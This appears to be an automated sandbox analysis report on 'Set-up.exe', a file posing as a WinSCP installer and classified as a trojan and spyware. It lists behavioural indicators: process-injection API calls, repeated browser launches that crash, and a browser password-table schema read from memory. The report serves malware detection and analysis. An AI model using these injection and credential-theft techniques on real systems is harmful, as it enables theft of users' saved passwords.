Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockinglock:
Source: Set-up.exe	String found in binary or memory: http://winscp.net/schema/session/1.0
Source: Set-up.exe	String found in binary or memory: http://www.borland.com/namespaces/Types
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-passport-req
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-passport-reqWWW-AuthenticatePassport1.4Passport1.4http://www.w
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-redirect
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-redirecthttp://www.webdav.org/neon/hooks/http-redirectAborted
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Set-up.exe	String found in binary or memory: https://filezilla-project.org/bThis
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Set-up.exe	String found in binary or memory: https://github.com/UweRaabe/PngComponents
Source: Set-up.exe	String found in binary or memory: https://github.com/bji/libs30https://github.com/bji/libs3/blob/master/LICENSE$Error
Source: Set-up.exe	String found in binary or memory: https://github.com/plashenkov/TBX
Source: Set-up.exe	String found in binary or memory: https://jcl.delphi-jedi.org/
Source: Set-up.exe	String found in binary or memory: https://jrsoftware.org/tb2kdl.php
Source: Set-up.exe	String found in binary or memory: https://libexpat.github.io/?https://www.chiark.greenend.org.uk/~sgtatham/putty/licence.html
Source: Set-up.exe	String found in binary or memory: https://notroj.github.io/neon/
Source: Set-up.exe	String found in binary or memory: https://openssl-library.org/)WebDAV/HTTP
Source: Set-up.exe	String found in binary or memory: https://winscp.net/#https://winscp.net/eng/docs/history
Source: Set-up.exe	String found in binary or memory: https://winscp.net/D
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/docs/?ver=%s&lang=%s-https://winscp.net/eng/docs/%s?ver=%s&lang=%s
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/donate.php
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/translations.php:https://winscp.net/eng/docs/search.php?ver=%s&lang=%s&q=%sKh
Source: Set-up.exe	String found in binary or memory: https://winscp.net/forum/
Source: Set-up.exe	String found in binary or memory: https://winscp.net/updates.php#https://winscp.net/eng/download.php
Source: Set-up.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Set-up.exe	String found in binary or memory: https://www.fsf.org/
Source: Set-up.exe	String found in binary or memory: https://www.gnu.org/licenses/
Source: Set-up.exe	String found in binary or memory: https://www.gnu.org/licenses/why-not-lgpl.html
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026711E5 CreateThread,malloc,NtClose,free,	0_2_026711E5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0267066E NtProtectVirtualMemory,	0_2_0267066E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02670B72 NtGetContextThread,NtSetContextThread,NtResumeThread,	0_2_02670B72
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02670CD8 NtAllocateVirtualMemory,	0_2_02670CD8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026710E8 NtClose,	0_2_026710E8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026719C5 free,NtClose,free,	0_2_026719C5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0267114C NtClose,	0_2_0267114C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02671084 NtClose,	0_2_02671084
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02688419 NtWriteVirtualMemory,	0_2_02688419
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026884E0 NtWow64QueryInformationProcess64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,	0_2_026884E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026886C0 NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,	0_2_026886C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D2039 NtAllocateVirtualMemory,	0_2_043D2039
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D208C NtFreeVirtualMemory,	0_2_043D208C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D20CA NtProtectVirtualMemory,	0_2_043D20CA

Detected potential crypto function

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026886C0	0_2_026886C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D062F	0_2_043D062F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D003E	0_2_043D003E

One or more processes crash

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 144

Sample file is different than original file name gathered from version info

Source: Set-up.exe, 00000000.00000000.1342881075.0000000000D46000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs Set-up.exe
Source: Set-up.exe, 00000000.00000000.1347349204.0000000001E18000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewinscp.exe. vs Set-up.exe
Source: Set-up.exe	Binary or memory string: OriginalFilename vs Set-up.exe
Source: Set-up.exe	Binary or memory string: OriginalFilenamewinscp.exe. vs Set-up.exe

Uses 32bit PE files

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/49@1/1

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_043D0D3F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_043D0D3F

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Code function: 1_2_0000000140001130 LoadLibraryA,CoInitializeEx,allocator,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,CoCreateInstance,

1_2_0000000140001130

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1380
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4988
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2444
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4544
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3832

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d3a74326-2ebc-43e9-ac64-3fe40897303f

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000000.00000003.1524189472.0000000010A15000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D62000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1495551156.0000000010A15000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1485719615.000001438427A000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.1496803859.000001FB4001F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: kernel32LoadLibraryExA\/AddDllDirectory\<
Source: Set-up.exe	String found in binary or memory: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79, 2022/06/13-17:46:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.5 (Windows)" xmp:CreateDate="2022-06-27T15:58:50+01:00" xmp:ModifyDate="2022-09-01T10:59:47+01:00" xmp:MetadataDate="2022-09-01T10:59:47+01:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:1df1e3c7-03f5-1143-add8-c546d4d2a0a8" xmpMM:DocumentID="adobe:docid:photoshop:1fdce7f7-d0f3-8345-8210-9a399dc0c608" xmpMM:OriginalDocumentID="xmp.did:9d71b7e1-ed99-5f4c-b129-f6db64cc2a6c"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:9d71b7e1-ed99-5f4c-b129-f6db64cc2a6c" stEvt:when="2022-06-27T15:58:50+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:1df1e3c7-03f5-1143-add8-c546d4d2a0a8" stEvt:when="2022-09-01T10:59:47+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
Source: Set-up.exe	String found in binary or memory: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79, 2022/06/13-17:46:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.5 (Windows)" xmp:CreateDate="2022-06-27T15:59:46+01:00" xmp:ModifyDate="2022-09-01T11:07:26+01:00" xmp:MetadataDate="2022-09-01T11:07:26+01:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:51edf77f-337d-df4c-9412-c02490953f86" xmpMM:DocumentID="adobe:docid:photoshop:38f42b90-13ae-6648-ac1e-ffa02882af0e" xmpMM:OriginalDocumentID="xmp.did:c0055a1b-163f-6548-addc-8e97eea98b83"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:c0055a1b-163f-6548-addc-8e97eea98b83" stEvt:when="2022-06-27T15:59:46+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:51edf77f-337d-df4c-9412-c02490953f86" stEvt:when="2022-09-01T11:07:26+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 144
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 204
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1380 -s 224
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1380 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2444 -s 152
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2444 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3832 -s 228
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3832 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4544 -s 144
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4544 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4988 -s 224
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4988 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sxs.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 23057920 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0xe2c400
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x267800
Source: Set-up.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x473600

Source: Set-up.exe	Static PE information: More than 200 imports for KERNEL32.DLL
Source: Set-up.exe	Static PE information: More than 200 imports for USER32.DLL

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

PE file contains sections with non-standard names

Source: Set-up.exe

Static PE information: section name: .didata

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
